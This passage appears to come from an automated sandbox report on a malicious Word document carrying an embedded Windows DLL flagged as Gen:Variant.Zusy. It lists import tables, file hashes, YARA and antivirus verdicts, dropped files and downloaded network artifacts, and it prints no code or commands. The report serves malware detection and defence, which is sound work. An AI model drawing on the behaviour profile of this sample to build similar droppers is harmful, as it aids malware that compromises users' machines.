| CreateCompatibleDC | - | 0x4453b0 | 0x451b0 | 0x417b0 | 0x22 |
| CreateDIBSection | - | 0x4453b4 | 0x451b4 | 0x417b4 | 0x27 |
| DeleteObject | - | 0x4453b8 | 0x451b8 | 0x417b8 | 0x114 |
| GetCurrentObject | - | 0x4453bc | 0x451bc | 0x417bc | 0x170 |
| GetObjectW | - | 0x4453c0 | 0x451c0 | 0x417c0 | 0x19e |
| SelectObject | - | 0x4453c4 | 0x451c4 | 0x417c4 | 0x1ff |
KERNEL32.dll (50)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| CloseHandle | - | 0x4453cc | 0x451cc | 0x417cc | 0x45 |
| CreateDirectoryW | - | 0x4453d0 | 0x451d0 | 0x417d0 | 0x6f |
| CreateFileW | - | 0x4453d4 | 0x451d4 | 0x417d4 | 0x80 |
| CreateProcessA | - | 0x4453d8 | 0x451d8 | 0x417d8 | 0x95 |
| CreateToolhelp32Snapshot | - | 0x4453dc | 0x451dc | 0x417dc | 0xab |
| DeleteCriticalSection | - | 0x4453e0 | 0x451e0 | 0x417e0 | 0xbe |
| DeviceIoControl | - | 0x4453e4 | 0x451e4 | 0x417e4 | 0xcb |
| EnterCriticalSection | - | 0x4453e8 | 0x451e8 | 0x417e8 | 0xdc |
| FindClose | - | 0x4453ec | 0x451ec | 0x417ec | 0x11b |
| FindFirstFileW | - | 0x4453f0 | 0x451f0 | 0x417f0 | 0x126 |
| FindNextFileW | - | 0x4453f4 | 0x451f4 | 0x417f4 | 0x132 |
| FormatMessageW | - | 0x4453f8 | 0x451f8 | 0x417f8 | 0x14d |
| GetComputerNameW | - | 0x4453fc | 0x451fc | 0x417fc | 0x17b |
| GetConsoleMode | - | 0x445400 | 0x45200 | 0x41800 | 0x18b |
| GetEnvironmentVariableW | - | 0x445404 | 0x45204 | 0x41804 | 0x1c1 |
| GetFileInformationByHandle | - | 0x445408 | 0x45208 | 0x41808 | 0x1cd |
| GetLastError | - | 0x44540c | 0x4520c | 0x4180c | 0x1e6 |
| GetLocaleInfoW | - | 0x445410 | 0x45210 | 0x41810 | 0x1ea |
| GetModuleFileNameW | - | 0x445414 | 0x45214 | 0x41814 | 0x1f9 |
| GetModuleHandleW | - | 0x445418 | 0x45218 | 0x41818 | 0x1fd |
| GetProcAddress | - | 0x44541c | 0x4521c | 0x4181c | 0x231 |
| GetProcessHeap | - | 0x445420 | 0x45220 | 0x41820 | 0x237 |
| GetStartupInfoA | - | 0x445424 | 0x45224 | 0x41824 | 0x252 |
| GetStdHandle | - | 0x445428 | 0x45228 | 0x41828 | 0x255 |
| GetSystemInfo | - | 0x44542c | 0x4522c | 0x4182c | 0x266 |
| GetSystemTimeAsFileTime | - | 0x445430 | 0x45230 | 0x41830 | 0x26c |
| GetTempPathW | - | 0x445434 | 0x45234 | 0x41834 | 0x279 |
| GetTimeZoneInformation | - | 0x445438 | 0x45238 | 0x41838 | 0x28f |
| GetUserDefaultLocaleName | - | 0x44543c | 0x4523c | 0x4183c | 0x295 |
| GlobalMemoryStatusEx | - | 0x445440 | 0x45240 | 0x41840 | 0x2ba |
| HeapAlloc | - | 0x445444 | 0x45244 | 0x41844 | 0x2c5 |
| HeapFree | - | 0x445448 | 0x45248 | 0x41848 | 0x2c9 |
| HeapReAlloc | - | 0x44544c | 0x4524c | 0x4184c | 0x2cc |
| InitializeCriticalSection | - | 0x445450 | 0x45250 | 0x41850 | 0x2da |
| LeaveCriticalSection | - | 0x445454 | 0x45254 | 0x41854 | 0x329 |
| LoadLibraryA | - | 0x445458 | 0x45258 | 0x41858 | 0x32d |
| LocalFree | - | 0x44545c | 0x4525c | 0x4185c | 0x33a |
| Process32First | - | 0x445460 | 0x45260 | 0x41860 | 0x387 |
| Process32Next | - | 0x445464 | 0x45264 | 0x41864 | 0x389 |
| ReadFile | - | 0x445468 | 0x45268 | 0x41868 | 0x3c0 |
| SetFilePointerEx | - | 0x44546c | 0x4526c | 0x4186c | 0x430 |
| SetHandleInformation | - | 0x445470 | 0x45270 | 0x41870 | 0x43a |
| SetLastError | - | 0x445474 | 0x45274 | 0x41874 | 0x43d |
| SetUnhandledExceptionFilter | - | 0x445478 | 0x45278 | 0x41878 | 0x476 |
| Sleep | - | 0x44547c | 0x4527c | 0x4187c | 0x483 |
| TlsAlloc | - | 0x445480 | 0x45280 | 0x41880 | 0x494 |
| TlsGetValue | - | 0x445484 | 0x45284 | 0x41884 | 0x496 |
| TlsSetValue | - | 0x445488 | 0x45288 | 0x41888 | 0x497 |
| WriteConsoleW | - | 0x44548c | 0x4528c | 0x4188c | 0x4f2 |
| WriteFile | - | 0x445490 | 0x45290 | 0x41890 | 0x4f3 |
USER32.dll (6)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| EnumDisplayDevicesW | - | 0x445498 | 0x45298 | 0x41898 | 0xce |
| GetDC | - | 0x44549c | 0x4529c | 0x4189c | 0x10c |
| GetDesktopWindow | - | 0x4454a0 | 0x452a0 | 0x418a0 | 0x10e |
| GetKeyboardLayoutList | - | 0x4454a4 | 0x452a4 | 0x418a4 | 0x12e |
| GetSystemMetrics | - | 0x4454a8 | 0x452a8 | 0x418a8 | 0x17c |
| GetWindowRect | - | 0x4454ac | 0x452ac | 0x418ac | 0x199 |
| Parent File | C:\Users\kEecfMwgj\Desktop\0706_1643278086845.doc |
| MIME Type | application/vnd.microsoft.portable-executable |
| File Size | 291.69 KB |
| MD5 |
f7ce94d4fe93d92dd6538446e782c1a4
|
| SHA1 |
18dbc4733ed77fc5f6e4c55e5197ff7ebd4781a8
|
| SHA256 |
fc6f4f07399d011cd55104e6660dcf7d03cfcc2c6897cad9dcd6194625bfe593
|
| SSDeep |
6144:FzU8/N+o/63hP1NcmZglxvDf7U9RG7yH+t:mM+pwmWlhWQi+t
|
| ImpHash |
66ea5ae56a1ad0183ee81e788900c71c
|
AV Matches (1)
»
| Threat Name | Verdict |
|---|---|
| Gen:Variant.Zusy.391704 |
malicious
|
PE Information
»
| Image Base | 0x1000000 |
| Entry Point | 0x101fc28 |
| Size Of Code | 0x32800 |
| Size Of Initialized Data | 0xb7600 |
| File Type | FileType.dll |
| Subsystem | Subsystem.windows_gui |
| Machine Type | MachineType.i386 |
| Compile Timestamp | 2014-06-30 14:33:09+00:00 |
Sections (5)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x1001000 | 0x327cf | 0x32800 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.66 |
| .rdata | 0x1034000 | 0x11208 | 0x11400 | 0x32c00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.76 |
| .data | 0x1046000 | 0xa2f2c | 0x1c00 | 0x44000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.92 |
| .rsrc | 0x10e9000 | 0x49d | 0x600 | 0x45c00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.4 |
| .reloc | 0x10ea000 | 0x2b68 | 0x2c00 | 0x46200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.69 |
Imports (3)
»
KERNEL32.dll (78)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| VirtualProtectEx | - | 0x1034000 | 0x449fc | 0x435fc | 0x4f0 |
| GetCurrentThreadId | - | 0x1034004 | 0x44a00 | 0x43600 | 0x1c5 |
| GetModuleFileNameA | - | 0x1034008 | 0x44a04 | 0x43604 | 0x213 |
| GetModuleHandleA | - | 0x103400c | 0x44a08 | 0x43608 | 0x215 |
| CreateProcessA | - | 0x1034010 | 0x44a0c | 0x4360c | 0xa4 |
| GetEnvironmentVariableA | - | 0x1034014 | 0x44a10 | 0x43610 | 0x1db |
| GetSystemDirectoryA | - | 0x1034018 | 0x44a14 | 0x43614 | 0x26f |
| GetTempPathA | - | 0x103401c | 0x44a18 | 0x43618 | 0x284 |
| GetWindowsDirectoryA | - | 0x1034020 | 0x44a1c | 0x4361c | 0x2ae |
| RemoveDirectoryA | - | 0x1034024 | 0x44a20 | 0x43620 | 0x400 |
| SetFileAttributesA | - | 0x1034028 | 0x44a24 | 0x43624 | 0x45e |
| SetConsoleCP | - | 0x103402c | 0x44a28 | 0x43628 | 0x42c |
| SetConsoleOutputCP | - | 0x1034030 | 0x44a2c | 0x4362c | 0x442 |
| CreateFileW | - | 0x1034034 | 0x44a30 | 0x43630 | 0x8f |
| ReadConsoleW | - | 0x1034038 | 0x44a34 | 0x43634 | 0x3be |
| WriteConsoleW | - | 0x103403c | 0x44a38 | 0x43638 | 0x524 |
| SetStdHandle | - | 0x1034040 | 0x44a3c | 0x4363c | 0x487 |
| OutputDebugStringW | - | 0x1034044 | 0x44a40 | 0x43640 | 0x38a |
| LoadLibraryExW | - | 0x1034048 | 0x44a44 | 0x43644 | 0x33e |
| SetFilePointerEx | - | 0x103404c | 0x44a48 | 0x43648 | 0x467 |
| ReadFile | - | 0x1034050 | 0x44a4c | 0x4364c | 0x3c0 |
| GetConsoleMode | - | 0x1034054 | 0x44a50 | 0x43650 | 0x1ac |
| WideCharToMultiByte | - | 0x1034058 | 0x44a54 | 0x43654 | 0x511 |
| EnterCriticalSection | - | 0x103405c | 0x44a58 | 0x43658 | 0xee |
| LeaveCriticalSection | - | 0x1034060 | 0x44a5c | 0x4365c | 0x339 |
| DeleteCriticalSection | - | 0x1034064 | 0x44a60 | 0x43660 | 0xd1 |
| EncodePointer | - | 0x1034068 | 0x44a64 | 0x43664 | 0xea |
| DecodePointer | - | 0x103406c | 0x44a68 | 0x43668 | 0xca |
| MultiByteToWideChar | - | 0x1034070 | 0x44a6c | 0x4366c | 0x367 |
| GetStringTypeW | - | 0x1034074 | 0x44a70 | 0x43670 | 0x269 |
| GetLastError | - | 0x1034078 | 0x44a74 | 0x43674 | 0x202 |
| HeapFree | - | 0x103407c | 0x44a78 | 0x43678 | 0x2cf |
| HeapAlloc | - | 0x1034080 | 0x44a7c | 0x4367c | 0x2cb |
| RaiseException | - | 0x1034084 | 0x44a80 | 0x43680 | 0x3b1 |
| RtlUnwind | - | 0x1034088 | 0x44a84 | 0x43684 | 0x418 |
| GetCommandLineA | - | 0x103408c | 0x44a88 | 0x43688 | 0x186 |
| GetCPInfo | - | 0x1034090 | 0x44a8c | 0x4368c | 0x172 |
| UnhandledExceptionFilter | - | 0x1034094 | 0x44a90 | 0x43690 | 0x4d3 |
| SetUnhandledExceptionFilter | - | 0x1034098 | 0x44a94 | 0x43694 | 0x4a5 |
| SetLastError | - | 0x103409c | 0x44a98 | 0x43698 | 0x473 |
| InitializeCriticalSectionAndSpinCount | - | 0x10340a0 | 0x44a9c | 0x4369c | 0x2e3 |
| Sleep | - | 0x10340a4 | 0x44aa0 | 0x436a0 | 0x4b2 |
| GetCurrentProcess | - | 0x10340a8 | 0x44aa4 | 0x436a4 | 0x1c0 |
| TerminateProcess | - | 0x10340ac | 0x44aa8 | 0x436a8 | 0x4c0 |
| TlsAlloc | - | 0x10340b0 | 0x44aac | 0x436ac | 0x4c5 |
| TlsGetValue | - | 0x10340b4 | 0x44ab0 | 0x436b0 | 0x4c7 |
| TlsSetValue | - | 0x10340b8 | 0x44ab4 | 0x436b4 | 0x4c8 |
| TlsFree | - | 0x10340bc | 0x44ab8 | 0x436b8 | 0x4c6 |
| GetStartupInfoW | - | 0x10340c0 | 0x44abc | 0x436bc | 0x263 |
| GetModuleHandleW | - | 0x10340c4 | 0x44ac0 | 0x436c0 | 0x218 |
| GetProcAddress | - | 0x10340c8 | 0x44ac4 | 0x436c4 | 0x245 |
| IsProcessorFeaturePresent | - | 0x10340cc | 0x44ac8 | 0x436c8 | 0x304 |
| LCMapStringW | - | 0x10340d0 | 0x44acc | 0x436cc | 0x32d |
| GetLocaleInfoW | - | 0x10340d4 | 0x44ad0 | 0x436d0 | 0x206 |
| IsValidLocale | - | 0x10340d8 | 0x44ad4 | 0x436d4 | 0x30c |
| GetUserDefaultLCID | - | 0x10340dc | 0x44ad8 | 0x436d8 | 0x29b |
| EnumSystemLocalesW | - | 0x10340e0 | 0x44adc | 0x436dc | 0x10f |
| ExitProcess | - | 0x10340e4 | 0x44ae0 | 0x436e0 | 0x119 |
| GetModuleHandleExW | - | 0x10340e8 | 0x44ae4 | 0x436e4 | 0x217 |
| HeapSize | - | 0x10340ec | 0x44ae8 | 0x436e8 | 0x2d4 |
| GetProcessHeap | - | 0x10340f0 | 0x44aec | 0x436ec | 0x24a |
| GetStdHandle | - | 0x10340f4 | 0x44af0 | 0x436f0 | 0x264 |
| WriteFile | - | 0x10340f8 | 0x44af4 | 0x436f4 | 0x525 |
| GetModuleFileNameW | - | 0x10340fc | 0x44af8 | 0x436f8 | 0x214 |
| IsValidCodePage | - | 0x1034100 | 0x44afc | 0x436fc | 0x30a |
| GetACP | - | 0x1034104 | 0x44b00 | 0x43700 | 0x168 |
| GetOEMCP | - | 0x1034108 | 0x44b04 | 0x43704 | 0x237 |
| IsDebuggerPresent | - | 0x103410c | 0x44b08 | 0x43708 | 0x300 |
| GetFileType | - | 0x1034110 | 0x44b0c | 0x4370c | 0x1f3 |
| QueryPerformanceCounter | - | 0x1034114 | 0x44b10 | 0x43710 | 0x3a7 |
| GetCurrentProcessId | - | 0x1034118 | 0x44b14 | 0x43714 | 0x1c1 |
| GetSystemTimeAsFileTime | - | 0x103411c | 0x44b18 | 0x43718 | 0x279 |
| GetEnvironmentStringsW | - | 0x1034120 | 0x44b1c | 0x4371c | 0x1da |
| FreeEnvironmentStringsW | - | 0x1034124 | 0x44b20 | 0x43720 | 0x161 |
| HeapReAlloc | - | 0x1034128 | 0x44b24 | 0x43724 | 0x2d2 |
| CloseHandle | - | 0x103412c | 0x44b28 | 0x43728 | 0x52 |
| FlushFileBuffers | - | 0x1034130 | 0x44b2c | 0x4372c | 0x157 |
| GetConsoleCP | - | 0x1034134 | 0x44b30 | 0x43730 | 0x19a |
USER32.dll (8)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| CreateDialogIndirectParamA | - | 0x103413c | 0x44b38 | 0x43738 | 0x5f |
| DialogBoxIndirectParamW | - | 0x1034140 | 0x44b3c | 0x4373c | 0xa8 |
| GetDesktopWindow | - | 0x1034144 | 0x44b40 | 0x43740 | 0x123 |
| GetSysColorBrush | - | 0x1034148 | 0x44b44 | 0x43744 | 0x17c |
| GetWindowRect | - | 0x103414c | 0x44b48 | 0x43748 | 0x19c |
| GetClientRect | - | 0x1034150 | 0x44b4c | 0x4374c | 0x114 |
| GetForegroundWindow | - | 0x1034154 | 0x44b50 | 0x43750 | 0x12d |
| CreatePopupMenu | - | 0x1034158 | 0x44b54 | 0x43754 | 0x6b |
ole32.dll (2)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| OleUninitialize | - | 0x1034160 | 0x44b5c | 0x4375c | 0x149 |
| OleInitialize | - | 0x1034164 | 0x44b60 | 0x43760 | 0x132 |
Exports (4)
»
| Api name | EAT Address | Ordinal |
|---|---|---|
| Closewhether | 0x136a0 | 0x1 |
| Meantduck | 0x14b80 | 0x2 |
| My | 0x14960 | 0x3 |
| Ropemay | 0x14850 | 0x4 |
YARA Matches (1)
»
| Rule Name | Rule Description | Classification | Score | Actions |
|---|---|---|---|---|
| Document_Contains_Embedded_PE_File | PE file inside a document; possible malware dropper | - |
3/5
|
...
|
| c:\netlogon | Dropped File | Unknown |
N/A
Not Available because the file was not extracted successfully.
|
...
|
»
| MIME Type | - |
| File Size | - |
| MD5 | - |
| SHA1 | - |
| SHA256 | - |
| SSDeep | - |
| ImpHash | - |
| c:\users\keecfmwgj\appdata\local\gdipfontcachev1.dat | Dropped File | Stream |
clean
|
...
|
»
| MIME Type | application/octet-stream |
| File Size | 8.03 KB |
| MD5 |
3b124f39977734e519b4d76da3fd1429
|
| SHA1 |
93258edf50199af514b466e27af94b44f9eee8a7
|
| SHA256 |
790a6af00576b6ee07663cf571a92e5b72379c9d24f3599af1fa9fec8aeb168a
|
| SSDeep |
3:5tmlNlPlcy:5tm/
|
| ImpHash | - |
| c:\users\keecfmwgj\appdata\local\gdipfontcachev1.dat | Dropped File | Stream |
clean
|
...
|
»
| MIME Type | application/octet-stream |
| File Size | 108.45 KB |
| MD5 |
0306ed95a96a2ef6dc63d466568ea412
|
| SHA1 |
cd6917827015124445c45fa2ec6e99f85f7a4236
|
| SHA256 |
f68015b98d46b026dccb4e5260d5f983362aac8dd9a26e18cf02ac914cee79d7
|
| SSDeep |
1536:VPmuvXHgTllX9zbMxLtImBiKQu1TxqO9b:VmfX9zwxLlRsO9
|
| ImpHash | - |
| Also Known As | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\api_ipify_org[1].txt (Downloaded File) |
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 12 Bytes |
| MD5 |
5f61ad2e35e8d07aacb241664824725e
|
| SHA1 |
610a4f50b05d5f664c5cc47b6b3b86ca6cb4ced1
|
| SHA256 |
fd41cd2f48623ceb8d6d4fa774c80efa5c3f22c94bfd7a7c59543772b585d9a1
|
| SSDeep |
3:gRtWu:g73
|
| ImpHash | - |
| f399cb468bfa6115311c67fb0fd53982ced5cfae574206f5a3963f6f069949b3 | Downloaded File | Text |
clean
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 121 Bytes |
| MD5 |
404737b33d80383125258eebe5983a80
|
| SHA1 |
35ddf0fc88aace83ac0f1706c9aac36126d581c7
|
| SHA256 |
f399cb468bfa6115311c67fb0fd53982ced5cfae574206f5a3963f6f069949b3
|
| SSDeep |
3:RwTCLRSQQBpheLB+hFx63Fq3jM89xYu7WM61dUD/r+WM:zRSFfhe1cA+w8T17z6jag
|
| ImpHash | - |
| 194bdef778576fda197959ff7b20c5bf664e91ba45c7a740b799f44d571ec868 | Downloaded File | Text |
clean
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 56 Bytes |
| MD5 |
155c2c0bb9842fc39e3644e3a035ad65
|
| SHA1 |
c0c8ec760692c828c081fc603f0e95a9db22e763
|
| SHA256 |
194bdef778576fda197959ff7b20c5bf664e91ba45c7a740b799f44d571ec868
|
| SSDeep |
3:v5dOIonkN8kCuVb4J/EM:vmfkikX4J/p
|
| ImpHash | - |
| 3b7fd3df4b1eb87cf3805d83da48d2598a4ada8da008344c3fdd5dae1ab9e123 | Downloaded File | Text |
clean
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 12 Bytes |
| MD5 |
00a67ee675ae9726f7484497024570a7
|
| SHA1 |
36e06c575177d0443e356c8d73e43fef72dec02b
|
| SHA256 |
3b7fd3df4b1eb87cf3805d83da48d2598a4ada8da008344c3fdd5dae1ab9e123
|
| SSDeep |
3:29+M:29j
|
| ImpHash | - |
| 7446351edf854eae84c85b339c8e42ece360f3d3f617bc33374db7606fe2e28a | Downloaded File | Text |
clean
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 12 Bytes |
| MD5 |
8bc86a331bcdf3b396c8eaf9a12e3040
|
| SHA1 |
1104de798acadbfb995117f52ad8b9e5553b2cb8
|
| SHA256 |
7446351edf854eae84c85b339c8e42ece360f3d3f617bc33374db7606fe2e28a
|
| SSDeep |
3:Y91:Yz
|
| ImpHash | - |
| 2fafb70f3c46323eb35d313ccd79b13e53933687da5a9d2733ab05741bc72660 | Downloaded File | Text |
clean
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 12 Bytes |
| MD5 |
e6bb185b1d07adb5a1fe03d283a024ed
|
| SHA1 |
2c7dff71a8ac7450c8e971b1f627ad5418acbfce
|
| SHA256 |
2fafb70f3c46323eb35d313ccd79b13e53933687da5a9d2733ab05741bc72660
|
| SSDeep |
3:hr+UnS1:hrZM
|
| ImpHash | - |
| fefa19e96290545659421d6f83c073eea44de15eaa61ce0814e0a4e5e17827fe | Downloaded File | Text |
clean
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | text/plain |
| File Size | 12 Bytes |
| MD5 |
e642de2b5eae7a7666238b1a779561ef
|
| SHA1 |
32c7c8bf35ed2d02e84b8246debbf42c41d74646
|
| SHA256 |
fefa19e96290545659421d6f83c073eea44de15eaa61ce0814e0a4e5e17827fe
|
| SSDeep |
3:6j:6j
|
| ImpHash | - |
| Parent File | C:\Users\kEecfMwgj\Desktop\0706_1643278086845.doc |
| MIME Type | image/png |
| File Size | 551.17 KB |
| MD5 |
f7a8684abf43be2780e94e64b12715a9
|
| SHA1 |
d22db4569a89fd05fee98880b41d2f7d9159b529
|
| SHA256 |
8f813322cdca617967768c900b3982dd0ebd753a9292a2ecffb8a966f5fff1df
|
| SSDeep |
12288:wBGIYW4wA74FRrUSJUnKERsY10hYBzSF6G8MHZf5th8NS+LBS:wEIZ4wA74D4SQKxZcy8gthDWS
|
| ImpHash | - |
| Parent File | C:\Users\kEecfMwgj\Desktop\0706_1643278086845.doc |
| MIME Type | application/octet-stream |
| File Size | 4.86 KB |
| MD5 |
21328d6eaa23cd4e786d6c18ed931962
|
| SHA1 |
18fc2e4aa4d7dd1122c5ba11f4f073cf27720678
|
| SHA256 |
06b913dd62dbc9b1ae00ba33dd5bcd87e5efd5e2b56ebf7e2ea9fed37a91d5f6
|
| SSDeep |
48:unhNY46sdBgD89t1Tb4HKKZX3Y6kpnydHk0azLUX:MY4jBvt1X6Y+EDS
|
| ImpHash | - |
